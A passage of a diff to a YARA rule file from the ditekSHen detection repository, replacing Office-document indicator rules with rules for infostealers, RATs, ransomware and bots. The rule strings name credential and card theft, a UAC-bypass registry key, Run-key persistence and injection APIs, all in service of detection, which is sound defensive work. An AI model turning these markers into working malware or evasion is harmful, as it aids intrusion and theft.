+		$s4 = "ExceptionServices.ExceptionDispatchInfo" wide
+		$s5 = "Kernel32.Dll" wide
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and $vb and ( ( 1 of ( $cmd* ) and 1 of ( $kw* ) ) or ( 2 of ( $kw* ) ) )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_INDICATOR_OLE_Suspicious_Activex : FILE
+rule DITEKSHEN_MALWARE_Win_Cyberstealer : FILE
 {
 	meta:
-		description = "detects OLE documents with suspicious ActiveX content"
+		description = "Detects CyberStealer infostealer"
 		author = "ditekSHen"
-		id = "e4a74955-8519-561d-bb23-6469e7ae5aaa"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "cb02013f-ffb2-5a17-9d6e-1d19b0e98fb8"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L646-L676"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9920-L9941"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d9a672b0eeccd93b4ae98fef45560490171f8fc16b712d1e0141fc0ef1d0e342"
-		score = 65
-		quality = 73
+		logic_hash = "72413b68fa1381656202165dcd878761727e7caf0f15ccd65f3f2f842243a1f6"
+		score = 75
+		quality = 71
 		tags = "FILE"
 
 	strings:
-		$vb = "\\VBE7.DLL" ascii
-		$ax1 = "_Layout" ascii
-		$ax2 = "MultiPage1_" ascii
-		$ax3 = "_MouseMove" ascii
-		$ax4 = "_MouseHover" ascii
-		$ax5 = "_MouseLeave" ascii
-		$ax6 = "_MouseEnter" ascii
-		$ax7 = "ImageCombo21_Change" ascii
-		$ax8 = "InkEdit1_GotFocus" ascii
-		$ax9 = "InkPicture1_" ascii
-		$ax10 = "SystemMonitor1_" ascii
-		$ax11 = "WebBrowser1_" ascii
-		$ax12 = "_Click" ascii
-		$kw1 = "CreateObject" ascii
-		$kw2 = "CreateTextFile" ascii
-		$kw3 = ".SpawnInstance_" ascii
-		$kw4 = "WScript.Shell" ascii
-		$kw5 = { 43 68 72 [0-2] 41 73 63 [0-2] 4d 69 64 }
-		$kw6 = { 43 68 [0-2] 72 24 28 40 24 28 22 26 48 }
-		$kw7 = { 41 63 74 69 76 65 44 6f 63 75 6d 65 6e 74 }
+		$x1 = "\\Cyber Stealer\\" ascii
+		$s1 = "[Virtualization]" fullword wide
+		$s2 = "\"encryptedPassword\":\"([^\"]+)\"" fullword wide
+		$s3 = "CreditCard" fullword ascii
+		$s4 = "DecryptPassword" fullword ascii
+		$s5 = "_modTime" fullword ascii
+		$s6 = "_pathname" fullword ascii
+		$s7 = "_pathnameInZip" fullword ascii
+		$s8 = "GetBookmarksDBPath" fullword ascii
+		$s9 = "GrabberImages" fullword ascii
+		$r1 = "^1[a-km-zA-HJ-NP-Z1-9]{25,34}$" wide
+		$r2 = "^3[a-km-zA-HJ-NP-Z1-9]{25,34}$" wide
+		$r3 = "^([a-zA-Z0-9_\\-\\.]+)@([a-zA-Z0-9_\\-\\.]+)\\.([a-zA-Z]{2,5})$" wide
+		$r4 = "^(?!:\\/\\/)([a-zA-Z0-9-_]+\\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\\.[a-zA-Z]{2,11}?$" wide
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and $vb and 1 of ( $ax* ) and 2 of ( $kw* )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and ( 2 of ( $s* ) or 2 of ( $r* ) ) ) or 7 of ( $s* ) or ( 5 of ( $s* ) and 2 of ( $r* ) ) or ( all of ( $r* ) and 4 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_OLE_Suspicious_MITRE_T1117 : T1117 FILE
+rule DITEKSHEN_MALWARE_Win_Arrowrat : FILE
 {
 	meta:
-		description = "Detects MITRE technique T1117 in OLE documents"
+		description = "Detects ArrowRAT"
 		author = "ditekSHen"
-		id = "0f41b011-2b63-581f-aa10-9560f27d0a27"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "14d3aabe-1ef5-599f-adbd-61b580099447"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L678-L689"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9943-L9961"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f0d97f4de8bde18299ee0caee680a15070a1faa99fc318d144a7b7918c8cbb1f"
-		score = 65
-		quality = 75
-		tags = "T1117, FILE"
+		logic_hash = "13e6d4fd274f75c50aa4110276812d02885c03cfc269dde480db66955e5f703a"
+		score = 75
+		quality = 50
+		tags = "FILE"
 
 	strings:
-		$s1 = "scrobj.dll" ascii nocase
-		$s2 = "regsvr32" ascii nocase
-		$s3 = "JyZWdzdnIzMi5leGU" ascii
-		$s4 = "HNjcm9iai5kbGw" ascii
+		$s1 = "29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cV2lubG9nb" wide
+		$s2 = "Software\\Classes\\ms-settings\\shell\\open\\command" wide
+		$s3 = "DelegateExecute" fullword wide
+		$s4 = "powershell" wide
+		$s5 = "DESKTOP_HOOKCONTROL" fullword ascii
+		$s6 = "PROCESS_INFORMATION" fullword ascii
+		$s7 = "STARTUP_INFORMATION" fullword ascii
+		$s8 = /(Venom|Pandora)\shVNC/ fullword wide
+		$s9 = "cmd.exe /k START" fullword wide
+		$s10 = "ExclusionWD" fullword ascii
+		$s11 = "WinExec" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and 2 of them
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-rule DITEKSHEN_INDICATOR_OLE_Remotetemplate
+rule DITEKSHEN_MALWARE_Win_Ducktail : FILE
 {
 	meta:
-		description = "Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents"
+		description = "Detects DuckTail"
 		author = "ditekSHen"
-		id = "fbf40436-fc0a-5e55-89ac-5e1dd93e1833"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "2d1a8f9e-ed5f-53fa-8ba8-b6d1344f6d39"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L691-L702"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9963-L9991"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "80cc5b1a8a8899f632401956055374d265c734449e56ffeee5f0ba4911050f36"
+		logic_hash = "a416212e5f87b33fdc14590c3d6d6ebc2915c2b383adf78d660c9408beb2323f"
 		score = 75
 		quality = 75
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$olerel = "relationships/oleObject" ascii
-		$target1 = "Target=\"http" ascii
-		$target2 = "Target=\"file" ascii
-		$mode = "TargetMode=\"External" ascii
+		$s1 = "&global_scope_id=" wide
+		$s2 = "#ResolveMyIpAll" wide
+		$s3 = "#ApproveInvitesHandler" wide
+		$s4 = "#ProcessShareCok" wide
+		$s5 = "#InviteEmpHandler" wide
+		$s6 = "__activeScenarioIDs=%" wide
+		$s7 = "&__a=1&fb_dtsg=" wide
+		$s8 = "adAccountLimit\":(.*?)}" wide
+		$s9 = "|PUSH|" fullword wide
+		$s10 = "|SCREEN|" fullword wide
+		$s11 = "|SCREEC|" fullword wide
+		$s12 = "_ad_accounts>k__" ascii
+		$s13 = "get_Pwds" fullword ascii
+		$s14 = "Telegram.Bot" ascii
+		$s15 = { 2f 00 7b 00 43 00 59 00 52 00 7d 00 2e 00 74 00
+               78 00 74 00 00 15 2f 00 7b 00 4c 00 4f 00 47 00
+               7d 00 2e 00 74 00 78 00 74 00 00 15 2f 00 7b 00
+               43 00 46 00 47 00 7d 00 2e 00 74 00 78 00 74 00
+               00 15 2f 00 7b 00 50 00 52 00 53 00 7d 00 2e 00
+               74 00 78 00 74 00 00 15 2f 00 7b 00 53 00 43 00
+               52 00 7d 00 2e 00 6a 00 70 00 67 }
 
 	condition:
-		$olerel and $mode and 1 of ( $target* )
+		uint16( 0 ) == 0x5a4d and 13 of them
 }
-rule DITEKSHEN_INDICATOR_RTF_Malver_Objects : FILE
+rule DITEKSHEN_MALWARE_Win_Grum : FILE
 {
 	meta:
-		description = "Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents."
+		description = "Detect Grum spam bot"
 		author = "ditekSHen"
-		id = "2d9d80e0-473e-5aac-a576-8f0002e120e2"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "e9abaed1-f462-5099-b310-9f9244c0c8a2"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L704-L718"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9993-L10007"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "69136fb8ba180f6f86e569471bcefe8f55c61af73c66ebd6062ba7369aee9a72"
+		logic_hash = "42a1d57dcddda4a24037af136caace6110b90ee5702c7c01d2a77d2676048c74"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 
 	strings:
-		$obj1 = "\\objhtml" ascii
-		$obj2 = "\\objdata" ascii
-		$obj3 = "\\objupdate" ascii
-		$obj4 = "\\objemb" ascii
-		$obj5 = "\\objautlink" ascii
-		$obj6 = "\\objlink" ascii
+		$s1 = "loader_id" fullword ascii
+		$s2 = "start_srv" fullword ascii
+		$s3 = "lid_file_upd" fullword ascii
+		$s4 = "----=_NextPart_%03d_%04X_%08.8lX.%08.8lX" fullword ascii
+		$s5 = "rcpt to:<%s>" fullword ascii
+		$s6 = "ehlo %s" fullword ascii
+		$s7 = "%OUTLOOK_BND_" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and ( ( not uint8( 4 ) == 0x66 or not uint8( 5 ) == 0x31 or not uint8( 6 ) == 0x5c ) and 1 of ( $obj* ) )
+		( uint16( 0 ) == 0x5a4d and 5 of them ) or ( all of them )
 }
-rule DITEKSHEN_INDICATOR_PPT_Mastermana : FILE
+rule DITEKSHEN_MALWARE_Win_Dlinjector07 : FILE
 {
 	meta:
-		description = "Detects known malicious pattern (MasterMana) in PowerPoint documents."
+		description = "Detects downloader injector"
 		author = "ditekSHen"
-		id = "8e9b8185-6211-54c6-946d-b16f2226312a"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "244ad6fb-8769-5b57-84e2-66f51fccb32a"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L720-L740"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10009-L10025"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f8169e63b22fbbd48de9a63ff228d9d9fb105e95d2ea8a37c0993493515e8b2e"
+		logic_hash = "aef43b59ef7d0d62a853280ec1588a48d6c21da5218b7fd7e6ab1aa0f048896b"
 		score = 75
-		quality = 71
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$a1 = "auto_close" ascii nocase
-		$a2 = "autoclose" ascii nocase
-		$a3 = "auto_open" ascii nocase
-		$a4 = "autoopen" ascii nocase
-		$vb1 = "\\VBE7.DLL" ascii
-		$vb2 = { 41 74 74 72 69 62 75 74 ?? 65 20 56 42 5f 4e 61 6d ?? 65 }
-		$clsid = "000204EF-0000-0000-C000-000000000046" wide nocase
-		$i1 = "@j.mp/" ascii wide
-		$i2 = "j.mp/" ascii wide
-		$i3 = "\\pm.j\\\\:" ascii wide
-		$i4 = ".zz.ht/" ascii wide
-		$i5 = "/pm.j@" ascii wide
-		$i6 = "\\pm.j@" ascii wide
+		$x1 = "23lenrek[||]lldtn[||]daerhTemuseR[||]txetnoCdaerhTteS46woW[||]txetnoCdaerhTteS[||]txetnoCdaerhTteG46woW[||]txetnoCdaerhTteG[||]xEcollAlautriV[||]yromeMssecorPetirW[||]yromeMssecorPdaeR[||]noitceSfOweiVpamnUwZ[||]AssecorPetaerC" wide
+		$l1 = "[||]" wide
+		$r1 = "yromeMssecorPetirW" wide
+		$r2 = "xEcollAlautriV" wide
+		$r3 = "daerhTemuseR" ascii wide
+		$r4 = "noitceSfOweiVpamnUwZ" wide
+		$s1 = "Debugger Detected" fullword wide
+		$s2 = "payload" fullword ascii
+		$s3 = "_ENABLE_PROFILING" fullword wide
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and 1 of ( $i* ) and $clsid and 1 of ( $a* ) and 1 of ( $vb* )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or ( 1 of ( $l* ) and 2 of ( $r* ) ) or 6 of them )
 }
-rule DITEKSHEN_INDICATOR_XML_Webrelframe_Remotetemplate : FILE
+rule DITEKSHEN_MALWARE_Win_Stealerium : FILE
 {
 	meta:
-		description = "Detects XML web frame relations refrencing an external target in dropper OOXML documents"
+		description = "Detects Stealerium infostealer"
 		author = "ditekSHen"
-		id = "724650db-8d58-5e73-92e7-287890babc3b"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "ea137900-3add-54b4-9ce9-bc7e98f86d41"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L742-L752"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10027-L10042"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fbe209e31ddb4369de02b6e91bf65f0588089c7b838dcf80f182248790b59e20"
+		logic_hash = "a2834e7fe26ad0197a9e490ab517029ceed2e09506fcc37e6ddf0c1804fa6cb9"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$target1 = "/frame\" Target=\"http" ascii nocase
-		$target2 = "/frame\" Target=\"file" ascii nocase
-		$mode = "TargetMode=\"External" ascii
+		$x1 = "Stealerium" ascii wide
+		$x2 = /\.Target\.(Passwords|Messengers|Browsers|VPN|Gaming)\./ ascii
+		$x3 = /\.Modules\.(Keylogger|Implant|Passwords|Messengers|Browsers|VPN|Gaming|Clipper)\./ ascii
+		$s1 = "Timeout /T 2 /Nobreak" fullword wide
+		$s2 = "Directory not exists" wide
+		$s3 = "### {0} ### ({1})" wide
+		$s4 = /---\s(AntiAnalysis|WebcamScreenshot|Keylogger|Clipper)/ wide
+		$s5 = " *Keylogger " fullword wide
 
 	condition:
-		uint32( 0 ) == 0x6d783f3c and ( 1 of ( $target* ) and $mode )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 2 of ( $x* ) and all of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_OLE_Excel4Macros_DL1 : FILE
+rule DITEKSHEN_MALWARE_Linux_Gobrat : FILE
 {
 	meta:
-		description = "Detects OLE Excel 4 Macros documents acting as downloaders"
+		description = "Detects GobRAT"
 		author = "ditekSHen"
-		id = "4212d762-ea49-5884-b697-9313f43140d5"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "0561fa99-24ee-5e02-ba54-17a1dd81daa4"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L765-L789"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10044-L10062"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a3248027b83b982cccf235267aa27def4f640987d41c5f11509bde3e27b82fee"
+		logic_hash = "070687c909b066e38f72b6421b77670e87476d7e1eb1ed8d41d027836629eb71"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "Macros Excel 4.0" fullword ascii
-		$s2 = { 00 4d 61 63 72 6f 31 85 00 }
-		$s3 = "http" ascii
-		$s4 = "file:" ascii
-		$fa_exe = ".exe" ascii nocase
-		$fa_scr = ".scr" ascii nocase
-		$fa_dll = ".dll" ascii nocase
-		$fa_bat = ".bat" ascii nocase
-		$fa_cmd = ".cmd" ascii nocase
-		$fa_sct = ".sct" ascii nocase
-		$fa_txt = ".txt" ascii nocase
-		$fa_psw = ".ps1" ascii nocase
-		$fa_py = ".py" ascii nocase
-		$fa_js = ".js" ascii nocase
+		$x1 = "BotList" ascii
+		$x2 = "BotCount" ascii
+		$x3 = "/etc/services/zone/bot.log" ascii
+		$x4 = "aaa.com/bbb/me" ascii
+		$s1 = "encoding/gob." ascii
+		$s2 = ".GetMacAddress" ascii
+		$s3 = ".IpString2Uint32" ascii
+		$s4 = ".RegisterLogFile" ascii
+		$s5 = ".UniqueAppendString" ascii
+		$s6 = ".NewDaemon" ascii
+		$s7 = ".SimpleCommand" ascii
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and ( 3 of ( $s* ) and 1 of ( $fa* ) )
+		uint16( 0 ) == 0x457f and ( 3 of ( $x* ) or ( 2 of ( $x* ) and 3 of ( $s* ) ) or ( 1 of ( $x* ) and 5 of ( $s* ) ) or all of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_OLE_Excel4Macros_DL2 : FILE
+rule DITEKSHEN_MALWARE_Win_Hakunamatata : FILE
 {
 	meta:
-		description = "Detects OLE Excel 4 Macros documents acting as downloaders"
+		description = "Detects HakunaMatata ransomware"
 		author = "ditekSHen"
-		id = "ea331976-6e5d-5377-a100-0f265e97177f"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "43ca40bb-9eb6-558e-977d-f1fff5659565"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L791-L812"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10064-L10084"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "48ab27a2f81934f6f2f034ebcd40fc083b0d90850d12a951f03dab3a4c396ec6"
+		logic_hash = "b49705845e5440c3c1e47e196592ca2b31319d1af5265f2f954d3367e3d39d5c"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$e1 = "Macros Excel 4.0" ascii
-		$e2 = { 00 4d 61 63 72 6f 31 85 00 }
-		$a1 = { 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a 00 }
-		$a2 = { 18 00 17 00 aa 03 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a 00 }
-		$a3 = { 18 00 21 00 20 00 00 01 12 00 00 00 00 00 00 00 00 00 01 3a ff }
-		$a4 = { 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3a 00 }
-		$a5 = { 18 00 17 00 aa 03 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3a 00 }
-		$a6 = "auto_open" ascii nocase
-		$a7 = "auto_close" ascii nocase
-		$x1 = "* #,##0" ascii
-		$x2 = "=EXEC(CHAR(" ascii
-		$x3 = "-w 1 stARt`-s" ascii nocase
-		$x4 = ")&CHAR(" ascii
-		$x5 = "Reverse" fullword ascii
+		$s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
+		$s2 = "(?:[13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})" wide
+		$s3 = "<RSAKeyValue><Modulus>" wide
+		$s4 = "HAKUNA MATATA" ascii wide
+		$s5 = "EXCEPTIONAL_FILE" ascii
+		$s6 = "TRIPLE_ENCRYPT" ascii
+		$s7 = "FULL_ENCRYPT" ascii
+		$s8 = "TARGETED_EXTENSIONS" ascii
+		$s9 = "CHANGE_PROCESS_NAME" ascii
+		$s10 = "KILL_APPS_ENCRYPT_AGAIN" ascii
+		$s11 = "<ALL_DRIVES>b__" ascii
+		$s12 = "dataToEncrypt" ascii
+		$s13 = "<RECURSIVE_DIRECTORY_LOOK>" ascii
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and ( 1 of ( $e* ) and 1 of ( $a* ) and ( #x1 > 3 or 2 of ( $x* ) ) )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-rule DITEKSHEN_INDICATOR_RTF_Embedded_Excel_Urldownloadtofile : FILE
+rule DITEKSHEN_MALWARE_Win_Hakunamatata_Builder : FILE
 {
 	meta:
-		description = "Detects RTF documents that embed Excel documents for detection evation."
+		description = "Detects HakunaMatata ransomware builder"
 		author = "ditekSHen"
-		id = "39b8723c-1755-5e2f-8fb2-cca5e9eef915"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "dbf3490f-418c-5d3b-9f9e-e9fb29d8b652"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L814-L840"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10086-L10104"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9416664683c249a9dc2b3d506d9dea7067a638cc4ee5ef7138e5b33a8fcd2b96"
+		logic_hash = "ac258851de38504cf63ba51fd06f8a9a3dfbe0096d199ba702e9763b5ecc43e4"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$clsid1 = "2008020000000000c000000000000046" ascii nocase
-		$obj1 = "\\objhtml" ascii
-		$obj2 = "\\objdata" ascii
-		$obj3 = "\\objupdate" ascii
-		$obj4 = "\\objemb" ascii
-		$obj5 = "\\objautlink" ascii
-		$obj6 = "\\objlink" ascii
-		$ole1 = { d0 cf 11 e0 a1 b1 1a e1 }
-		$ole2 = "d0cf11e0a1b11ae1" ascii nocase
-		$ole3 = "64306366313165306131623131616531" ascii
-		$ole4 = "640a300a630a660a310a310a650a300a610a310a620a310a310a610a650a31"
-		$ole5 = { 64 30 63 66 [0-2] 31 31 65 30 61 31 62 31 31 61 65 31 }
-		$ole6 = "D0cf11E" ascii nocase
-		$s1 = "55524c446f776e6c6f6164546f46696c6541" ascii nocase
-		$s2 = "55524c4d4f4e" ascii nocase
+		$s1 = "ENCRYPT FILES IN PROCESS" wide
+		$s2 = "#TARGET_FILES" ascii wide
+		$s3 = "HAKUNA MATATA" ascii wide nocase
+		$s4 = "#PRIVATE_KEY" ascii wide
+		$s5 = "/target:winexe /platform:anycpu /optimize+" wide
+		$s6 = "/win32icon:" fullword wide
+		$s7 = "SkippedFolders" ascii
+		$s8 = "RECURSIVE_DIRECTORY_LOOK(" ascii
+		$s9 = "DRAW_WALLPAPER(" ascii
+		$s10 = "startupKey.SetValue(MESSAGE_FILE.Split('.')[0], executablePath);" ascii
+		$s11 = /\\obj\\(Debug|Release)\\Hakuna\sMatata\.pdb/ ascii
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and ( 1 of ( $clsid* ) and 1 of ( $obj* ) and 1 of ( $ole* ) and 1 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-rule DITEKSHEN_INDICATOR_OLE_Excel4Macros_DL3 : FILE
+rule DITEKSHEN_MALWARE_Win_Twarbot : FILE
 {
 	meta:
-		description = "Detects OLE Excel 4 Macros documents acting as downloaders"
+		description = "Detect TWarBot IRC Bot"
 		author = "ditekSHen"
-		id = "794cac49-e917-5282-8cbd-8ecf91a2dc9e"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "3acae103-c8d8-5959-83fd-f47d33da350b"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L842-L860"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10106-L10121"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "83eaf60b900119b9fcd458e9e9dda119fd71785821bf282e9385031368ff9891"
+		logic_hash = "6b1b0b92d2ea7adec58a4b0ac712384542d96dc8707b6f1f13df2d8150a03a7a"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$a1 = { 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a 00 }
-		$a2 = { 18 00 17 00 aa 03 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a 00 }
-		$a3 = { 18 00 21 00 20 00 00 01 12 00 00 00 00 00 00 00 00 00 01 3a ff }
-		$a4 = { 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3a 00 }
-		$a5 = { 18 00 17 00 aa 03 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3a 00 }
-		$a6 = "auto_open" ascii nocase
-		$a7 = "auto_close" ascii nocase
-		$s1 = "* #,##0" ascii
-		$s2 = "URLMon" ascii
-		$s3 = "DownloadToFileA" ascii
-		$s4 = "DllRegisterServer" ascii
+		$x1 = "TWarBot" fullword ascii
+		$s1 = "PRIVMSG #" ascii
+		$s2 = "C:\\marijuana.txt" fullword ascii
+		$s3 = "C:\\rar.bat" fullword ascii
+		$s4 = "C:\\zip.bat" fullword ascii
+		$s5 = "software\\microsoft\\windows\\currentversion\\app paths\\winzip32.exe" ascii
+		$s6 = "software\\microsoft\\windows\\currentversion\\app paths\\WinRAR.exe" ascii
+		$s7 = "a -idp -inul -c- -m5" ascii
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and 1 of ( $a* ) and all of ( $s* ) and #s1 > 3
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 3 of ( $s* ) ) or 5 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_DOC_Phishingpatterns : FILE
+rule DITEKSHEN_MALWARE_Win_G0Crypt : FILE
 {
 	meta:
-		description = "Detects OLE, RTF, PDF and OOXML (decompressed) documents with common phishing strings"
+		description = "Detects G0Crypt / BRG0SNet / NovaGP ransomware"
 		author = "ditekSHen"
-		id = "67372eb5-ed07-5062-a12e-9ad8c7070f0f"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "c0dd8a1b-1aa6-50be-92c4-125eabaf3f9f"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L862-L883"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10123-L10156"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "50b6566cb18512f887c07576391eb492101f7534da3460d5f7740ee6f4cf707d"
+		logic_hash = "a678bbb02b82c34fb5e7bdce2e60b0da88f12b094e7ca3b74345814d0da5ce42"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$s1 = "PERFORM THE FOLLOWING STEPS TO PERFORM DECRYPTION" ascii nocase
-		$s2 = "Enable Editing" ascii nocase
-		$s3 = "Enable Content" ascii nocase
-		$s4 = "WHY I CANNOT OPEN THIS DOCUMENT?" ascii nocase
-		$s5 = "You are using iOS or Android, please use Desktop PC" ascii nocase
-		$s6 = "You are trying to view this document using Online Viewer" ascii nocase
-		$s7 = "This document was edited in a different version of" ascii nocase
-		$s8 = "document are locked and will not" ascii nocase
-		$s9 = "until the \"Enable\" button is pressed" ascii nocase
-		$s10 = "This document created in online version of Microsoft Office" ascii nocase
-		$s11 = "This document created in previous version of Microsoft Office" ascii nocase
-		$s12 = "This document protected by Microsoft Office" ascii nocase
-		$s13 = "This document encrypted by" ascii nocase
-		$s14 = "document created in earlier version of microsoft office" ascii nocase
+		$x1 = "G0Crypt/go/" ascii
+		$x2 = "BRG0SNet" ascii
+		$x3 = "/NovaGroup" ascii
